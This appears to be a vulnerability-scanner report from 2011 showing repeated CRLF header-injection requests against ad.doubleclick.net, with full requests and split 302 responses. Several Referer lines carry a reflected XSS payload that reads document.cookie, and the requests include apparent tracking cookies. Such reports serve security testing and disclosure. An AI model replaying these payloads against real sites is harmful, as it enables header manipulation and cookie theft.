The value of REST URL parameter 1 is copied into the Location response header. The payload cdb71%0d%0a199c0f4f72 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /2521745cdb71%0d%0a199c0f4f72/newspeckle2.html HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.runnersworld.com/community/persona/index.jsp?UID=8381023245&plckPersonaPage=BlogViewPost&plckUserId=8381023245&plckPostId=Blog%3a8381023245Post%3abb649e12-3868-43dd-b515-23f9a69f8636&plckController=PersonaBlog&plckScript=personaScript&plckElementId=personaDest\6b663%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8d424413273
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/2521745cdb71
199c0f4f72/newspeckle2.html:
Date: Thu, 10 Mar 2011 22:19:54 GMT
Server: GFE/2.0
The value of REST URL parameter 2 is copied into the Location response header. The payload b5b93%0d%0aad6e02800c7 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /2521745/newspeckle2.htmlb5b93%0d%0aad6e02800c7 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.runnersworld.com/community/persona/index.jsp?UID=8381023245&plckPersonaPage=BlogViewPost&plckUserId=8381023245&plckPostId=Blog%3a8381023245Post%3abb649e12-3868-43dd-b515-23f9a69f8636&plckController=PersonaBlog&plckScript=personaScript&plckElementId=personaDest\6b663%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8d424413273
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/2521745/newspeckle2.htmlb5b93
ad6e02800c7:
Date: Thu, 10 Mar 2011 22:19:55 GMT
Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload ccaaa%0d%0a9a571279f20 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /2521746ccaaa%0d%0a9a571279f20/bluecoverforma2.html HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bicycling.com/?cm_sp=Network%20Banner-_-BI-_-Rodale.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/2521746ccaaa
9a571279f20/bluecoverforma2.html:
Date: Thu, 10 Mar 2011 16:40:59 GMT
Server: GFE/2.0
The value of REST URL parameter 2 is copied into the Location response header. The payload 61c52%0d%0aec7d1b61be3 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /2521746/bluecoverforma2.html61c52%0d%0aec7d1b61be3 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bicycling.com/?cm_sp=Network%20Banner-_-BI-_-Rodale.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/2521746/bluecoverforma2.html61c52
ec7d1b61be3:
Date: Thu, 10 Mar 2011 16:41:06 GMT
Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 76e46%0d%0a6bf3b474ea1 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /76e46%0d%0a6bf3b474ea1/N2434.127885.1691942218421/B5055470.38;sz=1x1;pc=[TPAS_ID];ord=8325851? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.womenshealthmag.com/?cm_sp=Network%20Banner-_-WH-_-Rodale.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/76e46
6bf3b474ea1/N2434.127885.1691942218421/B5055470.38;sz=1x1;pc=[TPAS_ID];ord=8325851:
Date: Thu, 10 Mar 2011 16:43:47 GMT
Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 2b2fd%0d%0ad346ead6547 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /2b2fd%0d%0ad346ead6547/N2724.rodale.com/B4504763.19;sz=1x1;pc=[TPAS_ID];ord=8296241? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.menshealth.com/?cm_mmc=MSN0Paid0Search-_-Mens0Health0Brand-_-Menshealth-_-Mens0Health%7c-%7c1026991568
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/2b2fd
d346ead6547/N2724.rodale.com/B4504763.19;sz=1x1;pc=[TPAS_ID];ord=8296241:
Date: Thu, 10 Mar 2011 16:46:03 GMT
Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 22a11%0d%0adadb4ba6c5f was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /22a11%0d%0adadb4ba6c5f/N3340.Rodale/B4469440.10;sz=1x1;ord=8297648? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bicycling.com/?cm_sp=Network%20Banner-_-BI-_-Rodale.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/22a11
dadb4ba6c5f/N3340.Rodale/B4469440.10;sz=1x1;ord=8297648:
Date: Thu, 10 Mar 2011 16:42:57 GMT
Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 2180f%0d%0aa85c900d6a3 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /2180f%0d%0aa85c900d6a3/N3340.Rodale/B4469440.2;sz=1x1;ord=8296241? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.menshealth.com/?cm_mmc=MSN0Paid0Search-_-Mens0Health0Brand-_-Menshealth-_-Mens0Health%7c-%7c1026991568
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/2180f
a85c900d6a3/N3340.Rodale/B4469440.2;sz=1x1;ord=8296241:
Date: Thu, 10 Mar 2011 16:42:15 GMT
Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 2a8c1%0d%0ab4ae771faf2 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /2a8c1%0d%0ab4ae771faf2/N3340.Rodale/B4469440.3;sz=1x1;ord=8310538? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.womenshealthmag.com/?cm_sp=Network%20Banner-_-WH-_-Rodale.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/2a8c1
b4ae771faf2/N3340.Rodale/B4469440.3;sz=1x1;ord=8310538:
Date: Thu, 10 Mar 2011 16:43:13 GMT
Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 57985%0d%0aea3a8bb8e04 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /57985%0d%0aea3a8bb8e04/N3340.Rodale/B4469440.4;sz=1x1;ord=8307632? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.runnersworld.com/?cm_sp=Network%20Banner-_-RW-_-Rodale.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/57985
ea3a8bb8e04/N3340.Rodale/B4469440.4;sz=1x1;ord=8307632:
Date: Thu, 10 Mar 2011 16:46:16 GMT
Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 13e7e%0d%0a1300da2a990 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /13e7e%0d%0a1300da2a990/N3340.Rodale/B4469440.5;sz=1x1;ord=8297648? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bicycling.com/?cm_sp=Network%20Banner-_-BI-_-Rodale.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/13e7e
1300da2a990/N3340.Rodale/B4469440.5;sz=1x1;ord=8297648:
Date: Thu, 10 Mar 2011 16:42:37 GMT
Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 1fcc3%0d%0a7b1aca2004 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /1fcc3%0d%0a7b1aca2004/N3340.Rodale/B4469440.7;sz=1x1;ord=8296241? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.menshealth.com/?cm_mmc=MSN0Paid0Search-_-Mens0Health0Brand-_-Menshealth-_-Mens0Health%7c-%7c1026991568
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/1fcc3
7b1aca2004/N3340.Rodale/B4469440.7;sz=1x1;ord=8296241:
Date: Thu, 10 Mar 2011 16:45:59 GMT
Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 77afd%0d%0acbd18977bd0 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /77afd%0d%0acbd18977bd0/N3340.Rodale/B4469440.8;sz=1x1;ord=8310538? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.womenshealthmag.com/?cm_sp=Network%20Banner-_-WH-_-Rodale.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/77afd
cbd18977bd0/N3340.Rodale/B4469440.8;sz=1x1;ord=8310538:
Date: Thu, 10 Mar 2011 16:43:11 GMT
Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 9588d%0d%0a8b3a22ba789 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /9588d%0d%0a8b3a22ba789/N3340.Rodale/B4469440.9;sz=1x1;ord=8307632? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.runnersworld.com/?cm_sp=Network%20Banner-_-RW-_-Rodale.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/9588d
8b3a22ba789/N3340.Rodale/B4469440.9;sz=1x1;ord=8307632:
Date: Thu, 10 Mar 2011 16:43:07 GMT
Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 61558%0d%0ac1a8d314f34 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /61558%0d%0ac1a8d314f34/N5767.womenshealthmagOX4554/B4627079.35;sz=1x1;ord=8322007? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.womenshealthmag.com/?cm_sp=Network%20Banner-_-WH-_-Rodale.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/61558
c1a8d314f34/N5767.womenshealthmagOX4554/B4627079.35;sz=1x1;ord=8322007:
Date: Thu, 10 Mar 2011 16:43:41 GMT
Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 7a76d%0d%0abcbbc2dd448 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /7a76d%0d%0abcbbc2dd448/N6138.127885.WOMENSHEALTH/B5295230.17;sz=1x1;pc=[TPAS_ID];ord=6984913814812899? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.womenshealthmag.com/?cm_sp=Network%20Banner-_-WH-_-Rodale.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/7a76d
bcbbc2dd448/N6138.127885.WOMENSHEALTH/B5295230.17;sz=1x1;pc=[TPAS_ID];ord=6984913814812899:
Date: Thu, 10 Mar 2011 16:45:22 GMT
Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 78aad%0d%0a049b38749bb was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /78aad%0d%0a049b38749bb/N6138.6483.MENSHEALTH/B5295230.20;sz=1x1;pc=[TPAS_ID];ord=8309460? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.menshealth.com/?cm_mmc=MSN0Paid0Search-_-Mens0Health0Brand-_-Menshealth-_-Mens0Health%7c-%7c1026991568
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/78aad
049b38749bb/N6138.6483.MENSHEALTH/B5295230.20;sz=1x1;pc=[TPAS_ID];ord=8309460:
Date: Thu, 10 Mar 2011 16:43:32 GMT
Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 77f38%0d%0a49cfd0de220 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /77f38%0d%0a49cfd0de220/N6138.6483.MENSHEALTH/B5295230.24;sz=1x1;pc=[TPAS_ID];ord=8309460? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.menshealth.com/?cm_mmc=MSN0Paid0Search-_-Mens0Health0Brand-_-Menshealth-_-Mens0Health%7c-%7c1026991568
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/77f38
49cfd0de220/N6138.6483.MENSHEALTH/B5295230.24;sz=1x1;pc=[TPAS_ID];ord=8309460:
Date: Thu, 10 Mar 2011 16:43:32 GMT
Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 84bba%0d%0a3dbcb4b9585 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /84bba%0d%0a3dbcb4b9585/N6138.6483.MENSHEALTH/B5295230.25;sz=1x1;pc=[TPAS_ID];ord=8309460? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.menshealth.com/?cm_mmc=MSN0Paid0Search-_-Mens0Health0Brand-_-Menshealth-_-Mens0Health%7c-%7c1026991568
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/84bba
3dbcb4b9585/N6138.6483.MENSHEALTH/B5295230.25;sz=1x1;pc=[TPAS_ID];ord=8309460:
Date: Thu, 10 Mar 2011 16:43:33 GMT
Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 3c2b9%0d%0a6d4346a60d9 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /3c2b9%0d%0a6d4346a60d9/N6357.menshealth.comOX4549/B4645123.52;sz=1x1;ord=8296241? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.menshealth.com/?cm_mmc=MSN0Paid0Search-_-Mens0Health0Brand-_-Menshealth-_-Mens0Health%7c-%7c1026991568
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/3c2b9
6d4346a60d9/N6357.menshealth.comOX4549/B4645123.52;sz=1x1;ord=8296241:
Date: Thu, 10 Mar 2011 16:42:35 GMT
Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 6d03d%0d%0a4b47254b0af was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /6d03d%0d%0a4b47254b0af/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BAENoyPd4TZ7sN9X0lAeTivDnB_GQ74ECga7P3B7AjbcBwJyyARABGAEgvs7lDTgAUMTE0OECYMnm9obIo6AZoAHXsf3cA7oBCTcyOHg5MF9hc8gBCdoBOmZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL1NNXzcuMi4zOTI1X0ZpbGUyX0J1cnBfMS4zLjA4Lmh0bWy4AhioAwHRA6UdSeRjy2TM6ANs6APUB-gDwQfoA9UF9QMCAADE&num=1&sig=AGiWqtzNnBgIlsjs7mSmiiLAu_ySFar1ug&client=ca-pub-4063878933780912&adurl=;ord=1648973795? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1299795013&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2FSM_7.2.3925_File2_Burp_1.3.08.html&dt=1299773413750&shv=r20101117&jsv=r20110307&saldr=1&correlator=1299773413772&frm=0&adk=1607234649&ga_vid=2011621435.1299773414&ga_sid=1299773414&ga_hid=15489387&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1075&bih=949&fu=0&ifi=1&dtd=54&xpc=XwwY3tlWp2&p=file%3A//
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
The value of REST URL parameter 1 is copied into the Location response header. The payload 6c73c%0d%0a2b896a07724 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
